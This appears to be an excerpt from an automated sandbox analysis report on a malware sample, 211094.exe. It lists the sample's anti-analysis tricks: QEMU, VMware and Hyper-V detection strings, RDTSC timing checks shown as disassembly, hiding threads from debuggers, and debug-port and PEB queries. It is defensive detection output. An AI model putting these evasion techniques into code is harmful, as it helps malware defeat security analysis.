      Source: C:\Users\user\Desktop\211094.exeFile opened: C:\Program Files\Qemu-ga\qemu-ga.exe
      Source: C:\Users\user\Desktop\211094.exeFile opened: C:\Program Files\qga\qga.exe
      Source: C:\Users\user\Desktop\211094.exeFile opened: C:\Program Files\Qemu-ga\qemu-ga.exe
      Source: C:\Users\user\Desktop\211094.exeFile opened: C:\Program Files\qga\qga.exe
      Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)Show sources
      Source: 211094.exeBinary or memory string: C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXE
      Tries to detect virtualization through RDTSC time measurementsShow sources
      Source: C:\Users\user\Desktop\211094.exeRDTSC instruction interceptor: First address: 00000000022930E8 second address: 00000000022930E8 instructions:
      Source: C:\Users\user\Desktop\211094.exeRDTSC instruction interceptor: First address: 00000000022964EA second address: 00000000022964EA instructions:
      Source: C:\Users\user\Desktop\211094.exeRDTSC instruction interceptor: First address: 0000000000564EA9 second address: 0000000000564EA9 instructions: 0x00000000 rdtsc 0x00000002 lfence 0x00000005 shl edx, 20h 0x00000008 or edx, eax 0x0000000a popad 0x0000000b inc cx 0x0000000d jmp 00007FE96CD147BCh 0x0000000f test bh, bh 0x00000011 mov eax, dword ptr [ebp+64h] 0x00000014 mov bx, word ptr [edx+00010040h] 0x0000001b jmp 00007FE96CD14832h 0x0000001d test bh, ch 0x0000001f mov ax, word ptr [eax] 0x00000022 xor ax, cx 0x00000025 xor bx, ax 0x00000028 test cl, FFFFFFF6h 0x0000002b cmp bx, 5A4Dh 0x00000030 je 00007FE96CD1482Bh 0x00000032 pushad 0x00000033 lfence 0x00000036 rdtsc
      Source: C:\Users\user\Desktop\211094.exeRDTSC instruction interceptor: First address: 0000000000561A42 second address: 0000000000561D0A instructions: 0x00000000 rdtsc 0x00000002 popad 0x00000003 test ah, ah 0x00000005 cmp dword ptr [edi+00000814h], 00000000h 0x0000000c je 00007FE96C4D6894h 0x00000012 test bl, dl 0x00000014 pushad 0x00000015 mov edx, 00000024h 0x0000001a rdtsc
      Source: C:\Users\user\Desktop\211094.exeRDTSC instruction interceptor: First address: 0000000000561D0A second address: 0000000000561DEB instructions: 0x00000000 rdtsc 0x00000002 popad 0x00000003 call 00007FE96CD14D7Dh 0x00000008 test dx, dx 0x0000000b cmp dword ptr [edi+00000818h], 00000000h 0x00000012 je 00007FE96CD148C4h 0x00000018 ret 0x00000019 test ah, ah 0x0000001b jmp 00007FE96CD1485Ch 0x0000001d mov eax, dword ptr fs:[00000030h] 0x00000023 mov eax, dword ptr [eax+0Ch] 0x00000026 jmp 00007FE96CD1482Eh 0x00000028 cmp bh, bh 0x0000002a mov eax, dword ptr [eax+0Ch] 0x0000002d cmp ch, ch 0x0000002f test edi, 19CD959Eh 0x00000035 test bl, al 0x00000037 test cx, 9800h 0x0000003c mov ecx, dword ptr [edi+00000808h] 0x00000042 cmp ah, bh 0x00000044 jmp 00007FE96CD14819h 0x00000046 test esi, 8F9A929Dh 0x0000004c mov dword ptr [eax+20h], ecx 0x0000004f mov esi, dword ptr [edi+00000800h] 0x00000055 mov dword ptr [eax+18h], esi 0x00000058 add esi, dword ptr [edi+00000850h] 0x0000005e mov dword ptr [eax+1Ch], esi 0x00000061 jmp 00007FE96CD1482Eh 0x00000063 test dl, dl 0x00000065 pushad 0x00000066 lfence 0x00000069 rdtsc
      Source: C:\Users\user\Desktop\211094.exeRDTSC instruction interceptor: First address: 0000000000561DEB second address: 0000000000561E31 instructions: 0x00000000 rdtsc 0x00000002 lfence 0x00000005 shl edx, 20h 0x00000008 or edx, eax 0x0000000a popad 0x0000000b cmp dword ptr [ebp+70h], 01h 0x0000000f je 00007FE96C4D673Eh 0x00000015 cmp dx, 76A4h 0x0000001a mov esi, edi 0x0000001c add esi, 00001000h 0x00000022 xor ecx, ecx 0x00000024 test bh, bh 0x00000026 cmp bl, bl 0x00000028 push ecx 0x00000029 pushad 0x0000002a mov ah, 77h 0x0000002c cmp ah, 00000077h 0x0000002f jne 00007FE96C4D6C46h 0x00000035 popad 0x00000036 push edi 0x00000037 mov eax, ebp 0x00000039 cmp dx, cx 0x0000003c add eax, 0000009Ch 0x00000041 push eax 0x00000042 pushad 0x00000043 lfence 0x00000046 rdtsc
      Source: C:\Users\user\Desktop\211094.exeRDTSC instruction interceptor: First address: 00000000004085E4 second address: 00000000004085EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
      Source: C:\Users\user\Desktop\211094.exeRDTSC instruction interceptor: First address: 000000000040897E second address: 0000000000408984 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
      Source: C:\Windows\SysWOW64\explorer.exeRDTSC instruction interceptor: First address: 00000000006F85E4 second address: 00000000006F85EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
      Source: C:\Windows\SysWOW64\explorer.exeRDTSC instruction interceptor: First address: 00000000006F897E second address: 00000000006F8984 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
      Source: C:\Users\user\Desktop\211094.exeCode function: 0_2_02291627 rdtsc
      Source: C:\Windows\explorer.exe TID: 2932Thread sleep time: -45000s >= -30000s
      Source: C:\Windows\SysWOW64\explorer.exe TID: 6780Thread sleep time: -42000s >= -30000s
      Source: C:\Windows\SysWOW64\explorer.exeLast function: Thread delayed
      Source: C:\Windows\SysWOW64\explorer.exeLast function: Thread delayed
      Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
      Source: explorer.exe, 00000006.00000000.380969821.0000000008430000.00000004.00000001.sdmpBinary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000
      Source: explorer.exe, 00000006.00000000.380915897.00000000083E9000.00000004.00000001.sdmpBinary or memory string: VMware SATA CD00dRom0
      Source: explorer.exe, 00000006.00000000.380788568.00000000082E2000.00000004.00000001.sdmpBinary or memory string: \\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
      Source: explorer.exe, 00000006.00000002.600452519.0000000005D50000.00000002.00000001.sdmpBinary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
      Source: explorer.exe, 00000006.00000000.376726194.00000000063F6000.00000004.00000001.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
      Source: explorer.exe, 00000006.00000000.380915897.00000000083E9000.00000004.00000001.sdmpBinary or memory string: VMware SATA CD00
      Source: explorer.exe, 00000006.00000000.376726194.00000000063F6000.00000004.00000001.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
      Source: explorer.exe, 00000006.00000000.380788568.00000000082E2000.00000004.00000001.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}>
      Source: explorer.exe, 00000006.00000002.600452519.0000000005D50000.00000002.00000001.sdmpBinary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
      Source: 211094.exeBinary or memory string: C:\Program Files\Qemu-ga\qemu-ga.exe
      Source: explorer.exe, 00000006.00000002.600452519.0000000005D50000.00000002.00000001.sdmpBinary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
      Source: explorer.exe, 00000006.00000000.380788568.00000000082E2000.00000004.00000001.sdmpBinary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000
      Source: explorer.exe, 00000006.00000000.380969821.0000000008430000.00000004.00000001.sdmpBinary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000-;
      Source: explorer.exe, 00000006.00000002.600452519.0000000005D50000.00000002.00000001.sdmpBinary or memory string: An unknown internal message was received by the Hyper-V Compute Service.
      Source: explorer.exe, 00000006.00000002.588091491.000000000095C000.00000004.00000020.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}G
      Source: C:\Users\user\Desktop\211094.exeProcess information queried: ProcessInformation

      Anti Debugging:

      barindex
      Contains functionality to hide a thread from the debuggerShow sources
      Source: C:\Users\user\Desktop\211094.exeCode function: 0_2_022904A2 NtSetInformationThread 000000FE,00000011,00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,00000000,?,?,?,02294B9A
      Hides threads from debuggersShow sources
      Source: C:\Users\user\Desktop\211094.exeThread information set: HideFromDebugger
      Source: C:\Users\user\Desktop\211094.exeThread information set: HideFromDebugger
      Source: C:\Users\user\Desktop\211094.exeThread information set: HideFromDebugger
      Source: C:\Users\user\Desktop\211094.exeProcess queried: DebugPort
      Source: C:\Users\user\Desktop\211094.exeProcess queried: DebugPort
      Source: C:\Users\user\Desktop\211094.exeProcess queried: DebugPort
      Source: C:\Windows\SysWOW64\explorer.exeProcess queried: DebugPort
      Source: C:\Users\user\Desktop\211094.exeCode function: 0_2_02291627 rdtsc
      Source: C:\Users\user\Desktop\211094.exeCode function: 0_2_02293349 LdrInitializeThunk,
      Source: C:\Users\user\Desktop\211094.exeCode function: 0_2_02291627 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\211094.exeCode function: 0_2_02291F39 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\211094.exeCode function: 0_2_02294B44 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\211094.exeCode function: 0_2_02291F91 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\211094.exeCode function: 0_2_02291F97 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\211094.exeCode function: 0_2_02294FE4 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\211094.exeCode function: 0_2_02291FCD mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\211094.exeCode function: 0_2_022957C5 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\211094.exeCode function: 0_2_02292D95 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\211094.exeCode function: 4_2_1E4F7E41 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\211094.exeCode function: 4_2_1E4F7E41 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\211094.exeCode function: 4_2_1E4F7E41 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\211094.exeCode function: 4_2_1E4F7E41 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\211094.exeCode function: 4_2_1E4F7E41 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\211094.exeCode function: 4_2_1E4F7E41 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\211094.exeCode function: 4_2_1E5AAE44 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\211094.exeCode function: 4_2_1E5AAE44 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\211094.exeCode function: 4_2_1E4F766D mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\211094.exeCode function: 4_2_1E50AE73 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\211094.exeCode function: 4_2_1E50AE73 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\211094.exeCode function: 4_2_1E50AE73 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\211094.exeCode function: 4_2_1E50AE73 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\211094.exeCode function: 4_2_1E50AE73 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\211094.exeCode function: 4_2_1E51A61C mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\211094.exeCode function: 4_2_1E51A61C mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\211094.exeCode function: 4_2_1E4EC600 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\211094.exeCode function: 4_2_1E4EC600 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\211094.exeCode function: 4_2_1E4EC600 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\211094.exeCode function: 4_2_1E518E00 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\211094.exeCode function: 4_2_1E5A1608 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\211094.exeCode function: 4_2_1E59FE3F mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\211094.exeCode function: 4_2_1E4EE620 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\211094.exeCode function: 4_2_1E5B8ED6 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\211094.exeCode function: 4_2_1E528EC7 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\211094.exeCode function: 4_2_1E59FEC0 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\211094.exeCode function: 4_2_1E5136CC mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\211094.exeCode function: 4_2_1E4F76E2 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\211094.exeCode function: 4_2_1E5116E0 mov ecx, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\211094.exeCode function: 4_2_1E57FE87 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\211094.exeCode function: 4_2_1E5646A7 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\211094.exeCode function: 4_2_1E5B0EA5 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\211094.exeCode function: 4_2_1E5B0EA5 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\211094.exeCode function: 4_2_1E5B0EA5 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\211094.exeCode function: 4_2_1E4FEF40 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\211094.exeCode function: 4_2_1E4FFF60 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\211094.exeCode function: 4_2_1E5B8F6A mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\211094.exeCode function: 4_2_1E50F716 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\211094.exeCode function: 4_2_1E57FF10 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\211094.exeCode function: 4_2_1E57FF10 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\211094.exeCode function: 4_2_1E5B070D mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\211094.exeCode function: 4_2_1E5B070D mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\211094.exeCode function: 4_2_1E51A70E mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\211094.exeCode function: 4_2_1E51A70E mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\211094.exeCode function: 4_2_1E4E4F2E mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\211094.exeCode function: 4_2_1E4E4F2E mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\211094.exeCode function: 4_2_1E51E730 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\211094.exeCode function: 4_2_1E5237F5 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\211094.exeCode function: 4_2_1E567794 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\211094.exeCode function: 4_2_1E567794 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\211094.exeCode function: 4_2_1E567794 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\211094.exeCode function: 4_2_1E4F8794 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\211094.exeCode function: 4_2_1E57C450 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\211094.exeCode function: 4_2_1E57C450 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\211094.exeCode function: 4_2_1E51A44B mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\211094.exeCode function: 4_2_1E50746D mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\211094.exeCode function: 4_2_1E5B740D mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\211094.exeCode function: 4_2_1E5B740D mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\211094.exeCode function: 4_2_1E5B740D mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\211094.exeCode function: 4_2_1E5A1C06 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\211094.exeCode function: 4_2_1E5A1C06 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\211094.exeCode function: 4_2_1E5A1C06 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\211094.exeCode function: 4_2_1E5A1C06 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\211094.exeCode function: 4_2_1E5A1C06 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\211094.exeCode function: 4_2_1E5A1C06 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\211094.exeCode function: 4_2_1E5A1C06 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\211094.exeCode function: 4_2_1E5A1C06 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\211094.exeCode function: 4_2_1E5A1C06 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\211094.exeCode function: 4_2_1E5A1C06 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\211094.exeCode function: 4_2_1E5A1C06 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\211094.exeCode function: 4_2_1E5A1C06 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\211094.exeCode function: 4_2_1E5A1C06 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\211094.exeCode function: 4_2_1E5A1C06 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\211094.exeCode function: 4_2_1E566C0A mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\211094.exeCode function: 4_2_1E566C0A mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\211094.exeCode function: 4_2_1E566C0A mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\211094.exeCode function: 4_2_1E566C0A mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\211094.exeCode function: 4_2_1E51BC2C mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\211094.exeCode function: 4_2_1E5B8CD6 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\211094.exeCode function: 4_2_1E5A14FB mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\211094.exeCode function: 4_2_1E566CF0 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\211094.exeCode function: 4_2_1E566CF0 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\211094.exeCode function: 4_2_1E566CF0 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\211094.exeCode function: 4_2_1E4F849B mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\211094.exeCode function: 4_2_1E507D50 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\211094.exeCode function: 4_2_1E523D43 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\211094.exeCode function: 4_2_1E563540 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\211094.exeCode function: 4_2_1E593D40 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\211094.exeCode function: 4_2_1E50C577 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\211094.exeCode function: 4_2_1E50C577 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\211094.exeCode function: 4_2_1E56A537 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\211094.exeCode function: 4_2_1E5AE539 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\211094.exeCode function: 4_2_1E514D3B mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\211094.exeCode function: 4_2_1E514D3B mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\211094.exeCode function: 4_2_1E514D3B mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\211094.exeCode function: 4_2_1E5B8D34 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\211094.exeCode function: 4_2_1E4F3D34 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\211094.exeCode function: 4_2_1E4F3D34 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\211094.exeCode function: 4_2_1E4F3D34 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\211094.exeCode function: 4_2_1E4F3D34 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\211094.exeCode function: 4_2_1E4F3D34 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\211094.exeCode function: 4_2_1E4F3D34 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\211094.exeCode function: 4_2_1E4F3D34 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\211094.exeCode function: 4_2_1E4F3D34 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\211094.exeCode function: 4_2_1E4F3D34 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\211094.exeCode function: 4_2_1E4F3D34 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\211094.exeCode function: 4_2_1E4F3D34 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\211094.exeCode function: 4_2_1E4F3D34 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\211094.exeCode function: 4_2_1E4F3D34 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\211094.exeCode function: 4_2_1E4EAD30 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\211094.exeCode function: 4_2_1E566DC9 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\211094.exeCode function: 4_2_1E566DC9 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\211094.exeCode function: 4_2_1E566DC9 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\211094.exeCode function: 4_2_1E566DC9 mov ecx, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\211094.exeCode function: 4_2_1E566DC9 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\211094.exeCode function: 4_2_1E566DC9 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\211094.exeCode function: 4_2_1E598DF1 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\211094.exeCode function: 4_2_1E4FD5E0 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\211094.exeCode function: 4_2_1E4FD5E0 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\211094.exeCode function: 4_2_1E5AFDE2 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\211094.exeCode function: 4_2_1E5AFDE2 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\211094.exeCode function: 4_2_1E5AFDE2 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\211094.exeCode function: 4_2_1E5AFDE2 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\211094.exeCode function: 4_2_1E4E2D8A mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\211094.exeCode function: 4_2_1E4E2D8A mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\211094.exeCode function: 4_2_1E4E2D8A mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\211094.exeCode function: 4_2_1E4E2D8A mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\211094.exeCode function: 4_2_1E4E2D8A mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\211094.exeCode function: 4_2_1E51FD9B mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\211094.exeCode function: 4_2_1E51FD9B mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\211094.exeCode function: 4_2_1E512581 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\211094.exeCode function: 4_2_1E512581 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\211094.exeCode function: 4_2_1E512581 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\211094.exeCode function: 4_2_1E512581 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\211094.exeCode function: 4_2_1E511DB5 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\211094.exeCode function: 4_2_1E511DB5 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\211094.exeCode function: 4_2_1E511DB5 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\211094.exeCode function: 4_2_1E5135A1 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\211094.exeCode function: 4_2_1E5B05AC mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\211094.exeCode function: 4_2_1E5B05AC mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\211094.exeCode function: 4_2_1E574257 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\211094.exeCode function: 4_2_1E4E9240 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\211094.exeCode function: 4_2_1E4E9240 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\211094.exeCode function: 4_2_1E4E9240 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\211094.exeCode function: 4_2_1E4E9240 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\211094.exeCode function: 4_2_1E5AEA55 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\211094.exeCode function: 4_2_1E52927A mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\211094.exeCode function: 4_2_1E59B260 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\211094.exeCode function: 4_2_1E59B260 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\211094.exeCode function: 4_2_1E5B8A62 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\211094.exeCode function: 4_2_1E4F8A0A mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\211094.exeCode function: 4_2_1E503A1C mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\211094.exeCode function: 4_2_1E5AAA16 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\211094.exeCode function: 4_2_1E5AAA16 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\211094.exeCode function: 4_2_1E4EAA16 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\211094.exeCode function: 4_2_1E4EAA16 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\211094.exeCode function: 4_2_1E4E5210 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\211094.exeCode function: 4_2_1E4E5210 mov ecx, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\211094.exeCode function: 4_2_1E4E5210 mov eax, dword ptr fs:[00000030h]
